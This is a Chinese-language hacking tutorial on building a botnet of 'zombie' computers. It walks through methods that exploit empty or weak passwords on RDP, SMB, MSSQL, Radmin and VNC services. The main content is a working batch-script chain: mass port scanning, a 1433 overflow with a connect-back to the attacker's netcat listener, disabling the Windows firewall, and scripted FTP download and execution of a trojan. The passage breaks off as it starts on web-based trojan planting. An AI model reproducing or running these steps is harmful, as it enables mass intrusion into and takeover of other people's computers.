基本方法
抓肉雞11種方法
首先得準備,免殺的STAT或 一隻免殺鴿子或者其他的遠控,一個免費空間,一些工具(下面會提到)掃3389連線埠
(適合新手)(抓不了國外肉雞)現在國內網路上流傳著一種克隆版的XP,安裝後會默認開啟一個賬號為new,密碼為空的賬戶,而且基本上都是開著3389的,我們就可以利用這一點來抓肉雞。首先用連線埠掃描工具(如S掃)掃一段IP的3389連線埠,掃完後就直接用遠程桌面連線開放3389的機器(也可以把結果保存為文本檔案,用批量生成3389連線的工具來連線),然後輸入賬號new登入,如果別人的電腦前沒人的話你就可以去你的空間下載你傳好的木馬安裝拉~~這種方法只針XP系統,如果遇到2000或者2003系統就不要試了呵呵。缺點也很明顯,如果別人不是用new賬號登入XP的,你再登入上去就會把他擠出去(XP只支持單用戶登入,用戶登入需要用工具開),或者電腦前有人你就不可能去打開IE下載木馬了。
掃135連線埠
首先先用連線埠掃描器掃一段IP的135連線埠,然後把結果保存,再用NTSCAN過濾有弱口令的機器,最後用recton開telnet傳馬。因為現在135和445連線埠都被防火牆禁止了,只能掃本地的135肉雞,要抓外地的只能用外地的135肉雞來掃。(詳細動畫可以去黑客網站搜尋135)掃445連線埠
和掃135抓肉雞差不多,首先先用連線埠掃描器掃一段IP的445連線埠,然後把結果保存,再用NTSCAN過濾有弱口令的機器,最後用啊D工具包開共享傳馬。因為現在135和445連線埠都被防火牆禁止了,只能掃本地的445肉雞,要抓外地的只能用外地的445肉雞來掃。(詳細動畫可以去黑客網站搜尋445)1433連線埠批量溢出
這個方法可以實現全自動抓雞
要用到的工具:S掃 sqlhello.exe nc.exe批處理檔案
首先先寫個批處理,打開記事本,把以下代碼複製修改後,儲存為掃描+溢出.bat檔案
@echo off
for /f \"eol=; tokens=1,2 delims= \" %%i in (tt.txt) do s.exe tcp %%i %%j 1433 1000 /save
@echo off
for /f \"eol=; tokens=1 delims= \" %%i in (Result.txt) do sqlhello %%i 1433 xxx.xxx.xx.xx 556
還要新建一個tt.txt,裡面你要掃的IP段,格式為XXX.XXX.XXX.XXX XXX.XXX.XXX.XXX,中間是空格
1433是要掃描的連線埠,1000是掃描執行緒數 ,do sqlhello %%i 1433 xxx.xxx.xx.xx 556 這個裡的XXX添你的IP,556是後面NC監聽的連線埠
然後再寫個批處理
@echo off
Nc -l -vv -p 556<nc.txt&&%0 這裡的556要和上面的保持一致,你也可以改成其他的值,但是2處都要改,然後保存為nc.bat
然後再新建一個nc.txt,裡面填寫溢出成功後讓肉雞下載你木馬的代碼。
這裡給出一種代碼
echo open X.X.X.X(你FTP的IP)>>daima.txt
echo username>>daima.txt
echo password>>daima.txt
echo bin>>daima.txt(以2進制傳輸數據)
echo get xxx.exe(你的木馬的檔案名稱,要放在根目錄下)>>daima.txt
echo bye>>daima.txt
net stop sharedaccess(關閉WINDOWS自帶防火牆)
ftp -s:daima.txt
xxx.exe(也是填你木馬的檔案名稱)
del daima.txt
注意上面的代碼回車符別刪掉,要不然就沒法下你的馬了。
上面的步驟都搞好後,就可以開始掃肉雞了。
先打開多個NC.bat,然後再打開掃描+溢出.bat,然後你就可以去睡大覺了。自動掃描,掃描完後自動溢出,溢出後還自動下馬執行,爽吧!所以這裡講詳細點,呵呵。還有42 21連線埠也可以這樣溢出,只要用這些連線埠的溢出工具就好了,詳細動畫可以去黑客網站搜尋1433。
忘了說,上面的工具和批處理什麼的都要放在同一個資料夾下。
掃1433抓肉雞之2
要用到的工具:連線埠掃描器 X-scanSQL綜合利用工具上面我們說過了,1433溢出現在成功率已經不高了,所以我們可以用另一種方法。
開了1433連線埠的機器一般都裝了SQL,所以我們可以猜測SQL弱口令來抓1433肉雞。
首先先用連線埠掃描器掃一段IP的1433連線埠,然後結果保存為文本檔案,接著用X-scan導入這些開了1433的IP,然後在掃描參數-全局設定-掃描模組這一欄里只勾上SQL-SERVER就可以了,其他不要勾。然後在外掛程式設定-連線埠相關設定-待檢測連線埠這一欄,只填1433連線埠。然後就可以開始掃描了。掃描完成後會有個報告,列出了有弱口令的機器,然後打開SQL綜合利用工具,輸入你掃到的弱口令來連線,接著打開SQL綜合利用工具-利用目錄,上傳你的木馬,然後在用DOS命令執行你的木馬就OK了。
掃SA弱口令
工具:WINNTAutoAttack SQL綜合利用工具打開WINNTAutoAttack,找一段IP添上,然後只勾上設定下的僅對PING檢查成功的機器進行檢測和SQL列出密碼為空的SA賬號,接著開始掃描,掃完後,用 SQL綜合利用工具連上傳馬執行就好了。
掃4899空口令
工具:連線埠掃描器 4899探測器 Radmin首先先用連線埠掃描器掃一段IP的4899連線埠,然後用4899探測器導入開了4899連線埠的IP,接著掃空令,最後用Radmin連線有空口令的機器,帶開檔案管理,上傳的你木馬運行就OK了。詳細動畫可以去黑客網站搜尋4899
掃5900連線埠
工具:VNC掃描器 VNC連線器首先用VNC掃描器掃描一段IP,掃描格式為vscan.exe(掃描器檔案名稱) -i 219.0.0.0-219.255.255.255(掃描IP段) -p 5900 -vnc -vv
掃描完成後會在掃描器所在的同一資料夾生成一個文本檔案,打開後有一列IP,IP後面的有一些單詞比如patched,banned,vulnerable,只有單詞為vulnerable才能連線。接著就用VNC連線器連線,下面就不用多說了吧? 詳細動畫可以去黑客網站搜尋VNC
接下來說說掛馬抓肉雞吧。方法有很多,比如BT掛馬、免費空間掛馬、迅雷掛馬等等,有些我也還不會,呵呵。下面就介紹幾種我會的。
